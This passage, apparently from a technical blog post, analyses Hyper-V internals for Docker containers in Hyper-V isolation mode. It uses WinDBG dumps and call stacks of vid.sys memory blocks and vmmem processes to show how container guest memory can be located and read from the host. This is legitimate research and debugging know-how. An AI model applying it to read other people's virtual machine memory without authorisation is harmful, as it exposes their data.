<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 243px; overflow: hidden; width: 624px;"><img height="243" src="https://lh3.googleusercontent.com/D-CnHrHjEkeiSXfm82c8C2fJyQJxFWDkaNTzAGAUQNgnMEI-23vezJp7rUt08O6pO2kn_YpTE1n-onGVw1tm6fh234NwfLtr9TCR04LlSCy_Eb5cteHMzm3ut_kkP8E-tthE-XA" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Count of GPAR and memory blocks for containers is much more:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 237px; overflow: hidden; width: 483px;"><img height="237" src="https://lh3.googleusercontent.com/AOb1MVdt2gM5hbpLmpgc2Icb_vR0qbw-ZlrRtFOFMXSnWvkvYSUNYnKyArVPhjPN804yx9kK-HrPxK2Gy0A8aThOJItwdFN-QxOzthPkuuzghNRGgWcL4u6uGjxI7PO0BD8jwE0" style="margin-left: 0px; margin-top: 0px;" width="483" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 250px; overflow: hidden; width: 354px;"><img height="250" src="https://lh6.googleusercontent.com/18gVX8O91et6zDBXEorrmM2j08qB6lzxQOsWFy2TlR_D6cSBlEhq-3uGPQPtoBvRdtprSGIcRZ9mp4XB-SgynpqGJW1VtJI0YKAanG7JutOIH6mzFgFY4_-BXEr1Y4aSEKCN64g" style="margin-left: 0px; margin-top: 0px;" width="354" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Hyper-V containers all Mblock objects contains zero. Like this:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> dc 0xffff958b7f0d14d0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff958b`7f0d14d0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff958b`7f0d14e0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff958b`7f0d14f0 00000000 00000000 00000000 00000000 ................</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">there is additional type of block inside vid.sys driver: reserve bucket block (VSMM_RESERVE_BUCKET)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 55px; overflow: hidden; width: 213px;"><img height="55" src="https://lh5.googleusercontent.com/tbPVTx_zqhvqnjZUp57Av7QxAm8pi8XI4GRoMBBza8u3BFXhZIc0zcPbmjHEK0Bmqz8AkJ0-WLfquCZfYpK5188iRomqNUO4QrV4ROOlVRqryvtcCL-U3PHGDE0zMC6-WjyKdDs" style="margin-left: 0px; margin-top: 0px;" width="213" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But it is not need for reading guest OS memory in standard case. We see that address is pointing to themselves (0x10 alignment).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Docker container with Hyper-V isolation mode</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Docker container in Hyper-V isolation mode creates quite a lot of processes (processes for 1 Windows Server 2019 nanoserver 1809 container):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 67px; overflow: hidden; width: 487px;"><img height="67" src="https://lh6.googleusercontent.com/3YPxVOdT1X0Bn6iyw1V82V8WctvirOZ7fkR_U5dXDrpFUuZ6GlIdN0vcXRMVTCH8ACbvCgNpwzPHav5JR4xDqVqH4LSeQND_uPBCosv2znDCU41g2rzq1dyICSh22JVivZNJKSc" style="margin-left: 0px; margin-top: 0px;" width="487" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We see 2 partition handles (by the count of vmwp.exe processes). The name of 1</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: 0.6em; vertical-align: super;">st</span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> of them matches the name of the user in the context of which the process is running.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 133px; overflow: hidden; width: 451px;"><img height="133" src="https://lh6.googleusercontent.com/nNncpUpq1FuLjYxrWxgU9DSekoImRctnX92g6iPs1UNNZjNZTKgYcU7RGsoqTc6MplL_n_cfAGKx8epEtkzX_TfdEez2R8d-ftOycqdWasM20krvVleKMKiLbp27AZ56g1w1fmg" style="margin-left: 0px; margin-top: 0px;" width="451" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However, this partition has irrelevant table of MBlock objects:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 88px; overflow: hidden; width: 435px;"><img height="88" src="https://lh4.googleusercontent.com/DKQBX9ymWZ5FYlNCjW0EaScir0GHRZXE1k1HvOm1aWl3bVNNyaso3heUUeq_HwtsgVOpFaFhtupJJ4I-ao6n9zQBxcDQRqDBa-rDJWwODLiWfy70sJPHAE44x7QnwOhv11ZsDp8" style="margin-left: 0px; margin-top: 0px;" width="435" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Elements count is 0x8e, but the MBlock object itself is only one, and it is empty. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Name of 2nd partition coincides with the identifier, created for container, and contains necessary Nt-kernel data, that can be used to access the memory of the container using WinDBG.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 149px; overflow: hidden; width: 546px;"><img height="149" src="https://lh3.googleusercontent.com/7bX2VfAgsLSpQKycEBoKfY69GKXsASIbcgvoWGLlY6Z64L9MIiVJu6HBtDqo2GY1lCpGucsa6wagI6GhBeF8f14LAh2oskTemJAXkFZOIABgQ0TP1njDqSuh_nfE68koKs56m5U" style="margin-left: 0px; margin-top: 0px;" width="546" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base address is the same as the Vmmem GPA Offset parameter, which is used for reading memory block from the context of the vmmem process.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 232px; overflow: hidden; width: 360px;"><img height="232" src="https://lh4.googleusercontent.com/CNRW0OLZDjrEL-OgdzAkynnSXu9CZrc6_eLSmYWjLdbpiCqfFLn0RkqEtJzdQgxm__uzAaVQVkdNZllach2N32lPcuprd4vBHnyFOxGXTWuppGYpRltERiBQQKWMTyfIhf-auB4" style="margin-left: 0px; margin-top: 0px;" width="360" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The offset of file mapping region in another vmmem instance are the same as VmmemGPA offset, using by hvmm.sys driver.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 259px; overflow: hidden; width: 457px;"><img height="259" src="https://lh6.googleusercontent.com/HjMQXoZjR2I955f0AyqDzR1Tozg93OwAowzeup_Xz100vmFBYmKhQ-gGHYs-OBxlLSoLeDOkkwA565KfAPAMmaxlBPytczgZz8OleqpBeFPWGN2jeZBZMCLHRVXdosBL8vI36n4" style="margin-left: 0px; margin-top: 0px;" width="457" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Different vmmem processes load different executables. But in the process, where there are fewer files, the number of active threads is 0.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 286px; overflow: hidden; width: 445px;"><img height="286" src="https://lh4.googleusercontent.com/hyKCwRrwIslii8V197p9rFjCUCIM_omV2psWQNlRsa9ARXQjg7acwbZB2s-y_-mkXQ8l-AgAft1Fkit5yVMAcrotSbPAHqI-9xPBecWo2OtiPmftfF4tj-ML6-gMub0hCUdm88Y" style="margin-left: 0px; margin-top: 0px;" width="445" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 148px; overflow: hidden; width: 328px;"><img height="148" src="https://lh4.googleusercontent.com/WRgsuGg5IT8HAMtSENqmdYtwnr7DtYObGlRPQKisst8KpNhb-VDCLlelnxdD3HnRJJArgNHGt7bYYXZB83KcsNsegPcWlUJka5duTI-3VPyjjdQoegzvQ6-uJx3IR1V_cNPF744" style="margin-left: 0px; margin-top: 0px;" width="328" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 2nd process of the vmmem docker container is not critical to execution. It can be killed through Process Hacker (the memory size will be several tens of kilobytes). The 1st vmmem process is also not critical for reading memory. The registers of the section to which the process is attached have the correct values, but when reading the kernel mode memory, zeros are returned.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After stopping the two aforementioned vmmem processes, you can still safely start processes inside the container through docker exec.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call stack of vmmem creation (3 times per container starting process)</span></div>
<div align="left" dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="169"></col><col width="222"></col><col width="232"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1st PsCreateMinimalProcess</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2nd PsCreateMinimalProcess</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3rd PsCreateMinimalProcess</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">: kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PsCreateMinimalProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!VmCreateMemoryProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmNtSlatMemoryProcessCreate</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Vid!VsmmProcesspMicroVmSetup</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!VidPartitionManager::Initialize</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 vmwp!VidPartitionManager::CreateInstance</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PsCreateMinimalProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!VmCreateMemoryProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmNtSlatMemoryProcessCreate</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 Vid!VsmmClonepTemplateCreate</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 vmwp!WorkerTaskSaving::StartSave</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!WorkerTaskSaving::RunSaveSteps</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 vmwp!WorkerTaskSaving::RunTask</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PsCreateMinimalProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!VmCreateMemoryProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmNtSlatMemoryProcessCreate</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 Vid!VsmmCloneTemplateApply</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 vmwp!VidPartitionManager::Initialize</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!VidPartitionManager::CreateInstance</span></div>
</td></tr>
</tbody></table>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We again see a pseudo Gpar object pointing to a user mode structure (as seen above, this block is created for interaction with virtual devices):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 50px; overflow: hidden; width: 586px;"><img height="50" src="https://lh6.googleusercontent.com/1m8ZP0DkJHWkJiqIcbp8xrhu2ibzsM-J7iuh3oTqrXbgEWYkagMQM85EK3-SstRXtixBWHe5AL87BPJIDIxK62E5tQbw-ED7OIh5x5Js7LZTDJ2rT9NybUNiI1oc1ydBV28dR8s" style="margin-left: 0px; margin-top: 0px;" width="586" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
